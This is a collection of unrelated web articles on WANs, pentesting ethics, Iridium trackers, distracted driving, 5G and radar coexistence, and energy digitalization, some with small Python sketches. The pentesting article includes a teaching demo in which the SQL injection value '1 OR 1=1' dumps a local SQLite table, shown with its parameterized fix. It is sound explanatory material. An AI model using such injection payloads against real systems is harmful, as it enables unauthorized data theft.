To create the 3D images, the researchers used the synchrotron particle accelerator at the Diamond Light Source. The synchrotron can capture 3D images much faster than a conventional laboratory X-ray instrument, in around 45 seconds. This enabled the team to see the dynamics, which had not been observed previously.
However, an even higher time resolution would significantly enhance the observations. These fluid pathways re-arrange themselves quickly, so ideally the team would like to capture observations every 100th of a second. That time resolution is currently only possible using optical light from microscopes combined with high-speed cameras, which are limited in their ability to observe fluids moving through real rocks.
More information: [PNAS] | <urn:uuid:424efbf8-a7d8-4fa4-be0b-1a50e9143ceb> | CC-MAIN-2022-40 | https://areflect.com/2017/07/18/engineers-dispelled-a-100-year-old-scientific-law-on-fluid-flow-through-rocks/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337625.5/warc/CC-MAIN-20221005105356-20221005135356-00519.warc.gz | en | 0.940646 | 455 | 4.125 | 4 |
Do you have a wide area network (WAN) at your company? If you operate globally, you probably do. That’s because WANs are powerful business tools. They make it possible for large organizations to communicate internally faster and more efficiently.
They also make it possible for consumers to enjoy company benefits they couldn’t enjoy in the past.
With all these things going for it, you’d think the WAN would be the next frontier in information technology.
But the state of the Enterprise WAN is mixed—at least according to a State of the Enterprise WAN 2019 report.
Clearly, WANs have their advantages and disadvantages and aren’t going away anytime soon.
Like every technological tool, you need to use them in the right scenario to benefit from them.
If your company is planning on creating a wide area network to boost global communications, it’s a huge benefit for you to know the advantages and disadvantages of WANs.
What Are Wide Area Networks?
WANs are large communication networks that connect locations over a wide geographical area, including cities, states, countries, and continents.
Enterprise WANs are often built for one organization and are usually private.
Often, they’re created using leased lines involving a direct point-to-point connection between two private sites.
A leased line is a direct connection between two points set up by a telecommunications carrier, like a T-1 channel. And while they resemble Local Area Networks (LANs) a great deal, WANs are structured and operate quite differently.
WANS have been around for a while with some people tracing their roots to the 1970s, 1980s and even the 1990s.
That’s when Frame Relay Service appeared as an alternative to the point-to-point service options then being offered.
This new service offered numerous advantages including lower monthly costs, fewer physical connections to oversee, and less expensive router hardware to manage.
In any case, WANs represented a viable communication option for businesses and remain so today.
WANs Grow and Expand
WAN technology has grown and expanded over the years. New technologies, services, and applications were developed during that time, dramatically boosting WANs’ impact on business.
Why are they so useful to businesses? Two Reasons:
- WANs let businesses use common resources to operate.
- WANs let businesses share internal functions, like sales, R&D, accounting, and marketing throughout authorized locations through the network.
Those two things boost productivity and communications.
The latest development in this area is software-defined WAN technology (SD-WAN) — a specific application of software-defined networking applied to wide area network connections. The virtualized server and storage structure of the modern data center is an example of software-defined networking. It makes the network more dynamic, manageable, and adaptable. For example, a WAN often connects branch offices to a central corporate network or connects data centers located great distances apart. With SD-WAN, more of the network’s controls are moved to the “cloud” using software. That lowers costs, reduces complexity, and increases flexibility. Plus, SD-WANs provide better security.
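The “software-defined” part boils down to a controller applying policy to live link measurements instead of static routing. The sketch below is a conceptual illustration of that idea only; it does not reflect any particular vendor’s SD-WAN product or API, and the link names and metrics are invented.

```python
# Conceptual sketch of SD-WAN-style path selection (no vendor API implied):
# a policy picks a link per application class from live link measurements.
def pick_link(app_class, links):
    """links: {name: {"latency_ms": .., "loss_pct": .., "up": bool}}"""
    candidates = {n: m for n, m in links.items() if m["up"]}
    if app_class == "voice":     # latency-sensitive: lowest latency wins
        return min(candidates, key=lambda n: candidates[n]["latency_ms"])
    if app_class == "bulk":      # loss-tolerant: lowest loss, then latency
        return min(candidates, key=lambda n: (candidates[n]["loss_pct"],
                                              candidates[n]["latency_ms"]))
    return next(iter(candidates))

links = {
    "mpls":      {"latency_ms": 18, "loss_pct": 0.0, "up": True},
    "broadband": {"latency_ms": 35, "loss_pct": 0.4, "up": True},
    "lte":       {"latency_ms": 60, "loss_pct": 1.2, "up": True},
}
print(pick_link("voice", links), pick_link("bulk", links))
```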
Advantages of WANs
If your company has branches in several locations, a wide area network is a viable option to boost productivity and increase internal communications. Below are some of the more critical business advantages to establishing a WAN:
Centralizes IT infrastructure
Many consider this WAN’s top advantage. A WAN eliminates the need to buy email or file servers for each office. Instead, you only have to set up one at your head office’s data center. Setting up a WAN also simplifies server management, since you won’t have to support, back up, host, or physically protect several units. Also, setting up a WAN provides significant economies of scale by providing a central pool of IT resources the whole company can tap into.
Boosts your privacy
Setting up a WAN allows you to share sensitive data with all your sites without having to send the information over the Internet. Having your WAN encrypt your data before you send it adds an extra layer of protection for any confidential material you may be transferring. With so many hackers out there just dying to steal sensitive corporate data, a business needs all the protection it can get from network intrusions.
Corporate WANs often use leased lines instead of broadband connections to form the backbone of their networks. Using leased lines offers several pluses for a company, including higher upload speeds than your typical broadband connections. Corporate WANs also generally have no monthly data transfer limits, so you can use these links as much as you like without boosting costs. Improved communications not only increase efficiency but also boost productivity.
Eliminates Need for ISDN
WANs can cut costs by eliminating the need to rent expensive ISDN circuits for phone calls. Instead, you can have your WAN carry them. If your WAN provider “prioritizes voice traffic,” you probably won’t see any drop off in voice quality, either. You may also benefit from much cheaper call rates when compared to calls made using ISDN circuits. Some companies use a hybrid approach. They have inbound calls come over ISDN and outbound calls go over the WAN. This approach won’t save you as much money, but it will still lower your bill.
Many WAN providers offer business-class support. That means you get a specific amount of uptime monthly, quarterly, or yearly as part of your SLA. They may also offer you round-the-clock support. Guaranteed uptime is a big plus no matter what your industry. Let’s face it. No company can afford to be down for any length of time in today’s business environment given the stringent demands of modern customers.
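When comparing those guarantees, it helps to translate an SLA percentage into the downtime it actually allows. A quick, purely illustrative conversion:

```python
# Convert an SLA uptime percentage into allowed downtime per month,
# useful when comparing provider guarantees (figures purely illustrative).
def allowed_downtime_minutes(uptime_pct, days=30):
    return (1 - uptime_pct / 100.0) * days * 24 * 60

for sla in (99.0, 99.9, 99.99):
    print(f"{sla}% uptime -> {allowed_downtime_minutes(sla):.1f} min/month")
```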
Cuts costs, increases profits
In addition to eliminating the need for ISDN, WANs can help you cut costs and increase profits in a wide variety of other ways. For example, WANs eliminate or significantly reduce the costs of gathering teams from different offices in one location. Your marketing team in the United States can work closely with your manufacturing team in Germany using video conferencing and email. Saving on the travel costs alone could make investing in a WAN a viable option for you.
WANs also provide some key technical advantages. In addition to providing support for a wide variety of applications and a large number of terminals, WANs allow companies to expand their networks through plug-in connections across locations and boost interconnectivity by using gateways, bridges, and routers. Plus, by centralizing network management and monitoring of use and performance, WANs ensure maximum availability and reliability.
Disadvantages of WANs
While WANs provide numerous advantages, they have their share of disadvantages. As with any technology, you need to be aware of these downsides to make an informed decision about WANs. The three most critical downsides are high setup costs, security concerns, and maintenance issues.
High setup costs
WANs are complicated and complex, so they are rather expensive to set up. Obviously, the bigger the WAN, the costlier it is to set up. One reason that the setup costs are high is the need to connect far-flung remote areas. However, by using public networks, you can set up a WAN using just software (SD-WAN), which reduces setup costs. Keep in mind also that the price/performance ratio of WANs is better now than a decade or so ago.
Security concerns
WANs open the way for certain types of internal security breaches, such as unauthorized use, information theft, and malicious damage to files. While many companies have some security in place when it comes to the branches, they deploy the bulk of their security at their data centers to control and manage information sent to their locations. This strategy reduces management costs but limits the company’s ability to deal directly with security breaches at their locations. Some companies also have a hard time compressing and accelerating SSL traffic without significantly increasing security vulnerabilities and creating new management challenges.
Maintenance issues
Maintaining a WAN is a challenge, no doubt about it. Guaranteeing that your data center will be up and operating 24/7 is the biggest maintenance challenge of all. Data center managers must be able to detect failures before they occur and reduce data center downtime as much as possible, regardless of the reasons. Downtime is costly; in fact, a study done by Infonetics Research estimates that medium and large businesses in North America lose as much as $100 million annually to IT and communication technology downtime.
Other maintenance concerns include link quality and performance degradation, on-demand throughput, load balancing for the data center, bandwidth management, scalability, and data center consolidation and virtualization.
As the person responsible for your company’s network requirements, you need to consider both the advantages and disadvantages of this powerful tool to make an informed decision on the viability of a WAN for your company.
WANs are powerful business tools. They boost an organization’s communications, competitiveness, and even profitability. But WANs also have their downsides, including internal security concerns and significant maintenance challenges. Either way, now you have the facts.
By Luke Willadsen
What is an Exploitation, Anyway?
If we leave it up to Merriam-Webster, an ‘exploitation’ is “an act or instance of exploiting.” Because that doesn’t quite clear things up, we’ll take it one step further: “to make use of meanly or unfairly for one’s own advantage.” When it comes to cybersecurity, and in keeping things ethical, exploitation is the execution of any method or technique that can be used to accomplish one of the following:
With a working definition that’s more in-line with the intention of this blog, let’s explore how one can ethically exploit something or someone.
Why Do We Exploit?
When it comes to exploitation as it relates to cybersecurity, there are two camps: white hat hackers, or ethical hackers, and malicious actors. Each of these two camps have very different motivations for performing exploitations on a network, system, or person.
White hat hackers conduct penetration tests, or pentests, in which exploitation is performed in order to uncover existing and/ or potential security holes so they can be fixed before malicious actors find them. This is ethical hacking. The ethical hacker conducting the pentest reports on the vulnerabilities they discover, including the path(s) they used to exploit the vulnerabilities, with the sole purpose of empowering the organization to work to resolve them.
Malicious actors, or cyber criminals, attempt to exploit networks, systems, and people with the intent to cause harm. This is non-ethical hacking. The cyber criminals conducting these actions do so to gain access to unauthorized or confidential data and use it against the victim, or to interrupt or disable access to information or systems in hopes of collecting a ransom payment before the victimized organization is able to return to normal business operations.
Penetration Testing: How One Ethically Exploits Something or Someone
Exploitation requires there to be flaws, otherwise known as vulnerabilities. Vulnerabilities can be just about anything, from highly technical flaws (i.e. how a computer program receives and processes tasks, a network protocol that has unused, legacy flags within it that the developers forgot existed, or the way a web application passes requests to its backend database) to human behavior (i.e. that super gullible Dave in Accounting or the security guard that’s a sucker for a nice smile and some donuts).
Individuals conducting pentests have to think outside the box. Once a vulnerability has been identified, and subsequently exploited, the compromised network, system, or person can be leveraged to deliver harm. For example, the aforementioned flaw in a web application may allow for a specially crafted HTTP GET request to be sent that then makes the database spit out all its dirty secrets. Or if a nice, personalized email is sent to Dave, he may be inclined to click on the link so that he can save a puppy’s life.
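To make the web-application example concrete, here is a small, self-contained illustration of that class of flaw using an in-memory SQLite database. It is not taken from any real engagement; the table, values, and parameter are invented, and the second query shows the parameterized fix.

```python
# Illustration of the kind of flaw described above, using in-memory SQLite:
# string-built SQL lets a crafted "id" parameter dump every row, while the
# parameterised version treats the input as data, not SQL.
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (id INTEGER, secret TEXT)")
db.executemany("INSERT INTO users VALUES (?, ?)", [(1, "alpha"), (2, "bravo")])

user_supplied = "1 OR 1=1"                        # e.g. taken from a GET parameter

vulnerable = db.execute(f"SELECT secret FROM users WHERE id = {user_supplied}")
print("vulnerable:", vulnerable.fetchall())        # -> every secret in the table

safe = db.execute("SELECT secret FROM users WHERE id = ?", (user_supplied,))
print("parameterised:", safe.fetchall())           # -> [] ; input not executed as SQL
```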
Evolution of Exploitation
In part 2 of this series we explore how vulnerability exploitation evolved over the early 2010s.
About the Author: Luke Willadsen, Technical Services Lead, EmberSec, is an InfoSec professional and white hat hacker. After getting his start with the Dept. of Defense in 2010, Luke leveraged his specialization in offensive security and eventually turned to private and public sector consulting. Mr. Willadsen has a bachelor’s degree in cybersecurity, a master’s degree in technology studies, an OSCP certification, and a CISSP certification. Outside of his professional life, Luke is a husband, an animal lover, a fitness enthusiast and a passable guitar player; he plays a bard in Dungeons and Dragons and enjoys a few rounds of Battlefield on his PS4 a night or two a week.
About EmberSec: EmberSec, a Division of By Light, serves as a provider of advanced, technical cybersecurity services and solutions. Whether that's testing the maturity and efficiency of your security program through technical assessments, integrating highly customized Managed Detection & Response capabilities, or aligning your infrastructure and security practices around industry frameworks, EmberSec understands the complexities involved in establishing a truly secure enterprise.
The EmberSec team is comprised of senior security researchers, operators, and intelligence professionals, and specializes in the following domains: | <urn:uuid:177a6f33-8f7f-4cb8-9404-10803ce9d779> | CC-MAIN-2022-40 | https://www.embercybersecurity.com/blog/blog-series-exploitations-penetration-testing-and-modern-cybersecurity-defenses | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337855.83/warc/CC-MAIN-20221006191305-20221006221305-00519.warc.gz | en | 0.91928 | 891 | 3.390625 | 3 |
Autonomous Ground Sensor
NAL Research participated in an unattended ground sensor program by implementing the Iridium data communication solution to meet shortfalls in the relay of time-sensitive information. The package includes sensors, an aerodynamic delivery body, a ground-brake subsystem and NAL Research’s Iridium data modem to provide real-time, two-way global communications capability. The modified NAL Research Iridium data modems withstood the impact of an air launch from 10,000 feet and continued to relay sensor data after hitting the ground.
NAL Research’s 9601-DGS satellite tracker was used for the first time to monitor a vehicle during the 2006 Tecate SCORE Baja 500 Race down in the Mexico Baja Peninsula. It is inarguably the world’s most intense off-road race known as the “roughest run under the sun.” The 9601-DGS was mounted on a vehicle’s exterior frame and transmitted back real-time location information to a command/control center every ten seconds during the entire grueling 1,000 mile race. The 9601-DGS survived 17 hours of constant pounding over rough and remote terrain.
Light Armor Vehicles
NAL Research’s 9601-DGSM satellite trackers are used to monitor fleets of light armor vehicles by the Department of Defense. They are installed inside each vehicle to relay real-time, encrypted location information to mobile and fixed command and control centers. The tracker can also be removed and used as a personal emergency beacon.
Polar Research Program
The “Tumbleweed Rover”, a NASA’s Jet Propulsion Laboratory (JPL) initiative, “rolled” out of the Amundsen-Scott South Pole Station on January 24, 2004, completing its roll across Antarctica’s polar plateau roughly eight days later. Along the way, the beach-ball-shaped device, roughly six feet in diameter, used the NAL Research’s Iridium data modem with GPS module to send information about its position, the surrounding air temperature, pressure, humidity and light intensity to a JPL ground station. The Tumbleweed’s success was evident throughout its 40-mile, wind-driven trek across Antarctica, despite some of the most trying conditions on planet Earth. The ultra-durable ball reached speeds of 10 miles per hour over the Antarctic ice cap, and traveled at an average speed of about 3.7 miles per hour.
RFID Development Kit
The SAVI Portable Deployment Kits (PDKs) are used across the U.S. Marine Corps to fill gaps in the current fixed RFID Infrastructure as part of the Marine Corps Total Asset/In-Transit Visibility (ITV) effort. The PDK is a mobile checkpoint solution that integrates several automatic identification and data collection (AIDC) technologies, including bar codes, active RFID and NAL Research’s A3LA-DG modem, all in a carrying case that can easily be transported by a single person and powered by a vehicle’s battery. The system collects and processes data from active RFID tags on equipment pallets and containers, then transmits it through the Iridium network to the Department of Defense ITV network server.
Tactical Medical Coordinating System
Tactical Medical Coordinating System (TacMedCS) is an electronic medical management system allowing warfighters to enter casualty information into a shared database. The casualty information is input into TacMedCS using handheld scanners with an integrated NAL Research A3LA modem to read RF-enabled dog tags and securely transmit data via the Iridium network.
Tactical Meteorological Observing
The Tactical Meteorological Observing System (AN/TMQ-53 TMOS) is a collection of U.S. Air Force weather sensors connected to a NAL Research’s custom-designed A3LA-IU Iridium modem. Its modular design allows deployment as a stand-alone suite of sensors. For the first time, field units have constant, up-to-date weather information to support warfighters. The Iridium-based solution ensures the availability of timely weather observations from any location on Earth. All levels of command can access the weather database through a common network.
Unmanned Ground Vehicle
The DARPA Grand Challenge was a field test designed to stimulate research and development of autonomous ground vehicle technology for future military applications. During the race, each vehicle was required to travel approximately 175 miles over rugged desert terrain using only onboard sensors and navigation equipment to find and follow the route and avoid obstacles. NAL Research equipped each of the vehicles with an Iridium tracker that transmitted its location several times per minute to the host server. This allowed each vehicle’s movements to be monitored as they negotiate the difficult terrain along the route. | <urn:uuid:dcf45918-8644-49e2-b5f9-301c5f7ca5e3> | CC-MAIN-2022-40 | https://www.nalresearch.com/applications/land/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337855.83/warc/CC-MAIN-20221006191305-20221006221305-00519.warc.gz | en | 0.899484 | 1,003 | 2.546875 | 3 |
As we've reported in the past, the death toll on US roads keeps increasing despite ever-safer vehicles. And people are overwhelmingly to blame; the National Highway Traffic Safety Administration calculates that 97 percent of all fatal crashes are due to human error. One factor in all this unsafe road behavior is distracted driving, and the past few weeks have seen my inbox bombarded with new studies on the topic. After a while, a deluge like that becomes hard to ignore, so I figured it was time to sit down and read through them. And the findings reveal that drivers aren't really getting any better about focusing on the road.
The various reports use a number of different methodologies: combing through NHTSA's Fatality Analysis Report System (FARS), data collected from smartphone apps, plus surveys of drivers and companies. So taken together, they ought to give us a decent picture of the problem. As we'll see, however, you can infer very different things depending on how you look at the data, particularly when you try to break it down geographically. Let's start with the analyses of NHTSA's crash data.
Safewise looked at FARS data for 2016 (the most recent year with complete data) to investigate the prevalence of distracted driving. It found that nine percent of all road fatalities, and six percent of driver fatalities, were caused by distracted driving and that the total number of deaths had increased by 14 percent in just two years. It then broke things down by state; the deadliest place to drive appears to be Mississippi, with 23.1 deaths per year for every 100,000 people. Alabama and South Carolina also exceeded 20 deaths per 100,000 people. Meanwhile, the District of Columbia is the safest place to drive, with just four deaths per 100,000 people. For context, the national average for the country was 11.6 deaths per 100,000 people.
Distracted driving: More than just cellphones
Looking past just fatal crashes, Safewise calculated that the average incidence of cellphone use causing distracted driving nationally is about 14 percent. It found the practice most prevalent among the youngest drivers (19 percent for 15-19 year olds), followed by those aged 20-29 (18 percent), 40-49 (17 percent), and 30-39 (16 percent). Elderly drivers are the least likely to use a cell phone while driving, with use as low as two percent for those aged 70 and above.
Erie Insurance, also using FARS data, came to the same conclusion about the overall incidence of cellphone use causing distracted driving crashes, adding the fact that 61 percent of distracted driving-related crashes were down to drivers daydreaming.
It's difficult to imagine legislation governing daydreaming while driving. But the past 10 years have seen plenty of legislation focused on preventing cell phone use while on the road. So Safewise looked at how well the states are enforcing laws to prevent cell phone use while driving. Fifteen states and DC have laws banning all cell phone use while driving, and most of the remaining ones at least ban texting while driving. Of these states, Delaware leads the pack in actually enforcing those laws, with 13,061 citations per 100,000 licensed drivers. New York (11,996) and DC (10,952) are the next best. But as you'll see in the infographic, many other states issue few if any tickets for breaking those laws.
Using smartphones to study smartphone use while driving
Drivemode is an Android app designed to adhere to NHTSA safety guidelines for a driving app, with a simplified UI and hands-free talk-to-texting. The company looked at data from its 177,000 users to identify national and state-level trends for messaging while driving. Ignoring received messages, it looked at more than 6.5 million "hands-free" messages sent via the app during 2017. It found that people message and drive most frequently during the afternoon rush hour, peaking at 6.87 messages per user per hour between 5pm and 6pm nationally. New Yorkers were the most frequent texters, with 8.21 messages per hour between 5pm and 6pm.
Next up was EverQuote. It used data from its EverDrive app, which uses the phone's GPS and accelerometers and gyroscopes, as well as noting whether the device screen is on or off, to generate a picture of each user's driving, scoring it from 0-100. In 2017, it collected data from 781 million miles of driving and found that speeding (38 percent) and cellphone use (37 percent) were the two most common unsafe behaviors among drivers. When it broke down the data by driver age, an interesting finding emerged: the very youngest drivers (17 or under) were actually the most cautious when it comes to speeding, even if they're among the worst for using a smartphone behind the wheel. It also found that there were no real gender differences in driving behavior.
When EverQuote looked at the data at a state level, some of the data appears to tell a slightly different story to the FARS data breakdown above. Many of the states with the best driving scores were in the Midwest, with Montana topping the charts: here only 33 percent of drivers used their phones, and only 19 percent of trips involved speeding. Wyoming scored an equally good score of 89.4 overall but with just slightly higher rates of cellphone use (34 percent) and speeding (22 percent).
Meanwhile the northeast corridor leads the nation for crappy driving. Worst of all is Connecticut; residents of this state scored the lowest average at 71.6, with 56 percent of trips involving speeding and 34 percent involving cell phone use. Surprisingly for this DC resident, Maryland drivers only scored fifth-worst overall.
Life360 also offers an iOS or Android app that can measure bad driving, and it, too, delved into its data to look at the problem. It found the most common times for cellphone use when driving was the afternoon rush hour (4pm-6pm) and also found that distracted driving causes other bad driving behaviors; drivers using their phones are four times more likely to speed and 40 percent more likely to have to brake heavily compared to their counterparts paying attention to the task at hand.
Like EverQuote, Life360 also found Midwest drivers to be the least distracted; Wyoming drivers used their phones only once every seven miles. Meanwhile it found New Jersey drivers ranked worst, picking up that phone every 4.7 miles.
Many dangerous drivers think they’re safe
Envista Forensics surveyed 2,000 people who admitted to recent dangerous driving behaviors—being rushed, distracted, aggressive, or intoxicated. Of these, 56 percent didn't actually think distracted driving was dangerous—a rather shocking fact. Among aggressive drivers, 25 percent said they wanted to teach someone else a lesson, 16 percent wanted to get even, and 12 percent wanted to intimidate the other driver. Only 47 percent said it reflected bad judgement upon their part.
But it did find signs of people wanting to do better. Three-quarters of those surveyed said they had tried and succeeded in driving intoxicated less often, 64 percent say they are being rushed and aggressive while driving less often, and 58 percent have tried and succeeded in driving distractedly less often. But 22 percent haven't even tried to be less distracted when driving, suggesting we have a ways to go. Envista also broke down its data geographically, discovering that drivers in the Southeast were most likely to minimize the danger of distracted driving. Meanwhile, those Northeasteners were most worried about being late (and therefore most likely to speed). It also looked at trends by age, finding Boomers most likely to say they can drive safely while intoxicated and Millennials five times more likely to say they can safely multitask while driving.
Even among people who have to drive for work, there's plenty of poor behavior out on the roads. Motus spoke to businesses about driving behavior and found that the cost to employers for vehicle crashes has risen from $47.4 billion in 2013 to $56.7 billion in 2017. And 68 percent of businesses have reported recent on-the-job crashes in company-owned vehicles, but only 42.6 percent of businesses are mandating driver safety programs before they let employees drive work vehicles. The data for on-the-job crashes involving employee-owned vehicles was 41 percent, with even fewer (19.5 percent) mandating driver safety programs.
All in all, the reports above paint a relatively bleak picture of our attitudes toward safe driving. As ever, the best advice if you're going to be behind the wheel is to put your phone in Do Not Disturb mode and place it out of sight in a cubby. | <urn:uuid:142a7545-cf20-4f3e-8c36-1074bc4331a9> | CC-MAIN-2022-40 | https://arstechnica.com/cars/2018/05/put-the-phone-down-new-studies-show-were-still-bad-at-distracted-driving/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335286.15/warc/CC-MAIN-20220928212030-20220929002030-00719.warc.gz | en | 0.970553 | 1,781 | 2.703125 | 3 |
Like many industries, the US Department of Defense understands how important 5G really is. This is a direct result of its high performance, support for security requirements and ability to assist data-driven applications and M2M communications. The DoD is the largest user of federal spectrum in the US and works with the NTIA and FCC to develop policies that enable the spectrum to support emerging technologies. They recognize that technology advances will drive spectrum uptake and, as a result, they need to ensure that they protect access to this vital resource for future military capabilities. As an early 5G adopter, the DoD is hosting a series of experiments and demos as a testbed for potential uses. They need to understand the mitigations required to operate at given frequencies and within given constraints.
One aspect of this work is underway at Hill Air Force Base (AFB), where the Air Force is evaluating the impact of 5G systems on airborne radars, and vice versa, in the mid-band spectrum. The aim is to develop techniques for using spectrum dynamically so that radars and 5G systems can coexist. To understand how 5G wireless networks and high-power radars can function in the same or adjacent spectrum bands, the DoD is operating testbeds that study the dynamics of 5G and radar and the potential interference between the systems. Based on interference measurements and analyses from this testbed, dynamic spectrum utilization technologies are being developed and evaluated. The DoD will extend and enhance these findings to optimize spectrum use across the full range of military operational needs.
A similar coordination study is underway in the UK, where the national regulator, Ofcom, specifies the thresholds and coordination procedure that protect existing radars in the 2.7GHz band from harmful interference from deployments in the 3.4GHz band.
Notably, in an earlier award in the 2.6GHz band, the UK Government implemented a radar remediation program to ensure ATC radars in the 2.7GHz band were modified to be more resilient to interference from the 3.4GHz band. However, with over 50 protected military radars and 38 civil radars potentially impacted by the 3.4GHz deployments, Ofcom has outlined a series of thresholds that must be met before deployment. The protection thresholds cannot be exceeded in any pointing direction of the protected radar antenna, and field strengths must not exceed the threshold limits for OOB emissions. Ofcom specified the propagation model ITU-R P.452-16 to predict signal levels for a given percentage of time, using a 50m digital terrain model (DTM) and clutter data. This propagation model calculates the communications signal and the out-of-band noise at the relevant protected radar location(s). Once MNOs confirm that the thresholds have been met, deployment can proceed.
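As a rough illustration of how such a coordination check works, the sketch below compares the predicted signal level at a protected radar against an in-band threshold. It substitutes simple free-space path loss for the ITU-R P.452-16 model that Ofcom actually specifies, and every numeric value (EIRP, distance, frequency, threshold) is an assumed placeholder rather than a figure from the regulation:

```python
import math

def free_space_path_loss_db(distance_km: float, freq_mhz: float) -> float:
    """Free-space path loss; a simple stand-in for the ITU-R P.452-16 model."""
    return 20 * math.log10(distance_km) + 20 * math.log10(freq_mhz) + 32.44

def predicted_level_dbm(eirp_dbm: float, distance_km: float, freq_mhz: float) -> float:
    """Predicted received level at the radar from one 5G sector."""
    return eirp_dbm - free_space_path_loss_db(distance_km, freq_mhz)

# Assumed example values only -- not Ofcom's actual figures.
THRESHOLD_DBM = -100.0   # assumed protection threshold at the radar
sector = {"eirp_dbm": 75.0, "distance_km": 6.5, "freq_mhz": 3600.0}

level = predicted_level_dbm(**sector)
print(f"Predicted level at radar: {level:.1f} dBm")
print("PASS" if level <= THRESHOLD_DBM else "FAIL: coordination/mitigation needed")
```

A real assessment would repeat this for every pointing direction of the radar antenna and for both the in-band signal and the out-of-band noise, using the terrain and clutter data that the regulator specifies.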
During its 5G network rollout, a leading MNO noted that some of its 5G towers fell within 7km of an ATC radar. These radars typically operate at 2.7-3.1GHz, while the 5G network operates in the 3580-3680MHz band. Given the close proximity of the two systems, it was expected that the 5G transmissions could interfere with the nearby radar and compromise safety. The studies focused primarily on 20MHz of the 5G transmission spectrum, due to a partial overlap.
To comply with Ofcom's regulations, a methodology was applied to support calculations. Broadly, this included:
Sites that failed the Ofcom criteria were then processed to identify potential mitigation measures. These included replacing the omni (peak-gain) antenna with a beamforming antenna pattern, reducing the bandwidth of the offending sectors, and de-activating the offending sector. Notably, sectors that failed to meet the OOB noise limit can only be de-activated, whereas sectors that fail only the in-band criterion can be mitigated by retracting the transmission bandwidth to 3600-3680MHz.
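That mitigation logic can be expressed as a simple decision rule. The sketch below only paraphrases the rules described in the previous paragraph, with invented sector flags:

```python
def choose_mitigation(oob_failed: bool, inband_failed: bool) -> str:
    """Pick a mitigation for a failing 5G sector, following the rules above."""
    if oob_failed:
        # Sectors breaching the out-of-band noise limit can only be switched off.
        return "de-activate sector"
    if inband_failed:
        # In-band failures allow less drastic options.
        return ("retract bandwidth to 3600-3680 MHz, "
                "or swap the omni antenna for a beamforming pattern")
    return "no action needed"

print(choose_mitigation(oob_failed=False, inband_failed=True))
```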
Radars play a critical role in national security, air traffic control, weather warnings, and other safety-of-life applications. Typical characteristics of radars, such as high transmitter peak powers and sensitive receiver designs, have resulted in exclusive or primary spectrum allocations for radar operations in selected bands. However, with the demand for radio spectrum growing, significant chunks of the spectrum have been reallocated to emerging technologies that could impact the successful operation of radars. Attention has therefore turned to the military applications that come under threat; these support vital air defence systems used for target detection, recognition, and weapon control. Protecting these valuable resources is essential and requires a good understanding of radio propagation, interference analysis, and mitigation techniques.
To support this high level of radio propagation modelling, military and civil operators turn to spectrum engineering tools to calculate the impact and identify mitigations.
ATDI supply frequency assignment and spectrum management solutions to defence and security organisations. These solutions support the planning and management of spectrum-dependent systems, including communications links, electronic warfare sensors, radio jammers and radars.
Catch up with our latest webinar on Managing 5G interference into ATC Radars | <urn:uuid:073e7809-9c74-40b7-8486-04db0b4662f0> | CC-MAIN-2022-40 | https://atdi.com/protecting-military-radars-from-5g-interference/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335286.15/warc/CC-MAIN-20220928212030-20220929002030-00719.warc.gz | en | 0.932834 | 1,037 | 2.65625 | 3 |
Technology has been increasingly adopted by all major industry sectors over the last several years, and the energy industry is no exception. In fact, the energy sector was an early adopter of digital technologies: in the 1970s, power utilities were digital pioneers, using emerging technologies to facilitate grid management and operation. Years ago, companies began replacing analog meters with digital and smart meters to improve energy efficiency, and oil and gas companies have long used digital technologies to improve decision-making for exploration and production assets, including reservoirs and pipelines.
The demand for energy is increasing rapidly. The energy sector is now undergoing a major transformation, and digitalization is one of the key enablers of that change.
Digitalization acts as a lever in the sector to combat climate change and optimize power generation processes, reducing emissions and supporting the decarbonization of the energy model. Industry 4.0 is a notion that is well known in the world of manufacturing: this “fourth industrial revolution” incorporates automation and data to optimize production and improve flexibility and efficiency within a smart factory environment. The equivalent digital revolution in energy, referred to as Energy 4.0, involves advanced technologies such as IoT and digital twins to build smart grids and manage renewable energy and distributed generation. The global IoT market is expected to grow from USD 761.4 billion in 2020 to USD 1,386.06 billion by 2026, a CAGR of 10.53% over the forecast period (2021-2026).
In the mining, oil, and gas industries, IoT solutions combine machine data and analytics to meet the operational efficiency requirements set by energy businesses. Actionable data helps improve decision-making and reduce vulnerabilities and risk factors. New IoT trends in manufacturing have emerged in the last six years: drones and IoT sensors are used to inspect facilities and lines, and smart grid meters provide up-to-the-minute data on the demand for oil, gas, water, and electricity. IoT devices can also monitor changes in temperature, moisture, and vibration, making it possible to prevent equipment failures and increase human safety. By deploying IoT technologies, smart cities aim to increase the quality of life while lowering energy consumption. Businesses, policymakers, and entrepreneurs in cities will work together to see that urban areas play their part in the energy revolution.
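As a small example of the kind of condition monitoring described above, the sketch below flags abnormal vibration readings against a rolling baseline. The sensor values, window size, and alert threshold are invented for illustration:

```python
from statistics import mean, stdev

def find_anomalies(readings, window=10, z_limit=3.0):
    """Flag readings that deviate strongly from the recent rolling baseline."""
    alerts = []
    for i in range(window, len(readings)):
        baseline = readings[i - window:i]
        mu, sigma = mean(baseline), stdev(baseline)
        if sigma and abs(readings[i] - mu) / sigma > z_limit:
            alerts.append((i, readings[i]))
    return alerts

# Simulated vibration readings (mm/s); the spike at the end is the "fault".
vibration = [2.1, 2.0, 2.2, 2.1, 1.9, 2.0, 2.1, 2.2, 2.0, 2.1, 2.0, 2.1, 6.8]
print(find_anomalies(vibration))  # -> [(12, 6.8)]
```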
Digital twin technology ranks among the top strategic trends and has been adopted by an ever-widening range of industries since its original development by NASA. A digital twin is an advanced duplicate that models a real-life object or process without replacing it. Using information gathered from IoT systems attached to its physical twin, the digital twin allows an organization to monitor KPIs. The goal is to feed the data into machine learning systems that can then alert operators to potential issues, expected costs, and the advantages of the available options for fixing the situation.
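In its simplest form, a digital twin is a model that predicts what a healthy asset should report under the current operating conditions, with an alert raised when the measurement drifts away from the prediction. The model, tolerance, and readings below are all assumptions made for illustration:

```python
def predicted_bearing_temp(ambient_c: float, load_pct: float) -> float:
    """Toy 'twin': expected bearing temperature of a healthy turbine (assumed model)."""
    return ambient_c + 0.35 * load_pct

def check_asset(ambient_c, load_pct, measured_c, tolerance_c=8.0):
    expected = predicted_bearing_temp(ambient_c, load_pct)
    residual = measured_c - expected
    if residual > tolerance_c:
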